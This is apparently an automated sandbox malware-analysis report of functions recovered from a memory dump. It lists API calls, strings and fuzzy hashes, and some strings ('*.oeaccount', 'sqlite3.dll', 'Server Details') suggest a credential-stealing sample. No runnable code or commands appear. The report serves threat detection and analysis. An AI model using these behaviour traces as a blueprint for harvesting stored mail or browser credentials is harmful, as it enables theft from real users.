• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??3@$memcpy$mallocstrlen
• String ID:
• API String ID: 1171893557-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SHGetMalloc.SHELL32(?), ref: 00410890
• SHBrowseForFolder.SHELL32(?), ref: 004108C2
• SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
• _mbscpy.MSVCRT ref: 004108E9
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: BrowseFolderFromListMallocPath_mbscpy
• String ID:
• API String ID: 1479990042-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
  • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
• sprintf.MSVCRT ref: 0040B684
• SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
  • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
  • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
• sprintf.MSVCRT ref: 0040B6AE
• _mbscat.MSVCRT ref: 0040B6C1
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
• String ID:
• API String ID: 203655857-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040AB44
• memset.MSVCRT ref: 0040AB5A
  • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
  • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
• sprintf.MSVCRT ref: 0040AB84
  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
• String ID: </%s>
• API String ID: 3699762281-259020660
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _ultoasprintf
• String ID: %s %s %s
• API String ID: 432394123-3850900253
                                                                                                                                                                                                                      • Opcode ID: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                                                                                      • Instruction ID: 4eecb7ebe0e72788cc5a9ba801a24b7f953e3738518a64b6aa949e1543d7b5d3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da56d414bae2e0ef01a77ba25b2d24ae14ce975277d8d1cdc00a6dd34e745ad8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD41C431804A1987D538D5B4878DBEB62A8A702304F5504BFEC9AB32D1D7FCAE45866E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                                                        • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                                                        • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                                                        • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                                                        • Part of subcall function 0040767C: ??3@YAXPAX@Z.MSVCRT ref: 00407683
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$??3@$??2@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID: C@
                                                                                                                                                                                                                      • API String ID: 1449862175-3201871010
                                                                                                                                                                                                                      • Opcode ID: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                                                                                      • Instruction ID: 7447114fd14c0d02a0ee842544e77a6286768af896f3cc7789f687588c6d710a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05e9bc18889996fc1c644d7848b4516204ab87caed7d052ccf358956a64e1b41
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88018871C04118AFDB00AF65DC45A8F7FB8DF05364F11C166F855B7191DB349A05CBA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00409682
                                                                                                                                                                                                                      • SendMessageA.USER32(5\@,00001019,00000000,?), ref: 004096B0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                                                                                      • String ID: 5\@
                                                                                                                                                                                                                      • API String ID: 568519121-3174280609
                                                                                                                                                                                                                      • Opcode ID: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                                                      • Instruction ID: d98da3e135da4b1536afdd38015dbf476e5e9df788621b23f2aabad48e216af8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F901D679810204EBDB209F85C881EBBB7F8FF84745F10482AE840A6291D3359D95CB79
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy
                                                                                                                                                                                                                      • String ID: L$ini
                                                                                                                                                                                                                      • API String ID: 714388716-4234614086
                                                                                                                                                                                                                      • Opcode ID: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                                                      • Instruction ID: f535223de382355a817e33459d0294d4a206ca3c03f6505affaa6c17102478c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE01B2B1D10218AFDF40DFA9D845ADEBBF4BB08348F14812AE515E6240EBB895458F99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • failed memory resize %u to %u bytes, xrefs: 00411074
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _msizerealloc
                                                                                                                                                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                      • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                      • Opcode ID: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                                                      • Instruction ID: 1811babadabc61a025a406b62bb89d9ddf1cf6d87da65dd644d5d85db6a8a765
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12D0C23290C2207EEA122644BC06A5BBB91DF90370F10C51FF618951A0DA3A8CA0638A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: GetMenuItemCount.USER32(?), ref: 00408CA2
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408CC6
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: GetMenuItemInfoA.USER32(?), ref: 00408CFC
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408D29
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: strchr.MSVCRT ref: 00408D35
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: _mbscat.MSVCRT ref: 00408D90
                                                                                                                                                                                                                        • Part of subcall function 00408C8C: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00408DAC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                      • String ID: menu_%d
                                                                                                                                                                                                                      • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                      • Opcode ID: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                                                      • Instruction ID: fc9d5e34a24bd2be33db7f468ba420a1802cee0dbde2c18454a4e056650a0418
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96D0C23064174022FB3023266D0EF4B29595BC3B47F1400AEF400B10D2CBBC400486BE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
  • Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104), ref: 00406D3F
• strrchr.MSVCRT ref: 00409579
• _mbscat.MSVCRT ref: 0040958E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: FileModuleName_mbscatstrrchr
• String ID: _lng.ini
• API String ID: 3334749609-1948609170
• Opcode ID: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
• Instruction ID: 2d2b68270352c45da0ce721119a0fec427a5e2ae0c2a4fc26ba4743072087242
• Opcode Fuzzy Hash: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
• Instruction Fuzzy Hash: 25C080521466A024F1173222AD03B4F05844F5370CF25005BFD01351C3EF9D453141FF
Uniqueness

Uniqueness Score: -1.00%

APIs
• _mbscpy.MSVCRT ref: 00406E89
  • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
  • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
• _mbscat.MSVCRT ref: 00406E98
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _mbscat$_mbscpystrlen
• String ID: sqlite3.dll
• API String ID: 1983510840-1155512374
• Opcode ID: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
• Instruction ID: b4f080e30331be102d7f345a143f57ec91a882a22c28ed8e87256c61ce2af050
• Opcode Fuzzy Hash: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
• Instruction Fuzzy Hash: E3C0803240513125BB0177717C028AF7D48DF82394B01046EF58561111DD694D3255EB
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileString
• String ID: 34@$Server Details
• API String ID: 1096422788-1041202369
• Opcode ID: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
• Instruction ID: 5dc36b059aaaf95d4d37dbe6dd28276a8f332030ee7f3b0879c7395586969e1a
• Opcode Fuzzy Hash: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
• Instruction Fuzzy Hash: FFC04C36948B01BBDE029F909D05F1EBE62BBA8B01F504519F285210AB82754524EB26
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
• Opcode ID: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
• Instruction ID: 1cbfd9147006f86015284e0c7f96a5a033359537089e49602f9f07bbf2bf02d4
• Opcode Fuzzy Hash: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
• Instruction Fuzzy Hash: B761DE72604702AFDB20DF65E981A6BB7E4FF44304F44492EFA5982250D738ED54CBDA
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: FreeLocalmemcpymemsetstrlen
• String ID:
• API String ID: 3110682361-0
• Opcode ID: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
• Instruction ID: 82d09d3ec766172f421874171fbd662b4eebf604b8883e80537bb62e226e9057
• Opcode Fuzzy Hash: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
• Instruction Fuzzy Hash: 0631F832D0011D9BDF10DB64CD81BDEBBB8EF55314F1005BAE984B7281DA799E85CB94
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID:
• API String ID: 3510742995-0
• Opcode ID: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
• Instruction ID: c59a560e0875e34eddc7238b356bca14a42e0d2f6379eea325777a24e0ec34d0
• Opcode Fuzzy Hash: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
• Instruction Fuzzy Hash: 2E11E6B7D00618ABDB01DFA4DC899DEB7ACEB49310F414836FA05CB140E634E2488799
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
• Opcode ID: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
• Instruction ID: 34b624653e935ab7e36b2538589d62cee4ebe89d27a66743b3a416ac641d4af2
• Opcode Fuzzy Hash: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
• Instruction Fuzzy Hash: 8321B3B5A65300CEE7559F6A9845915FBE4FF90310B2AC8BF9218DB2B2D7B8C8408B15
Uniqueness

Uniqueness Score: -1.00%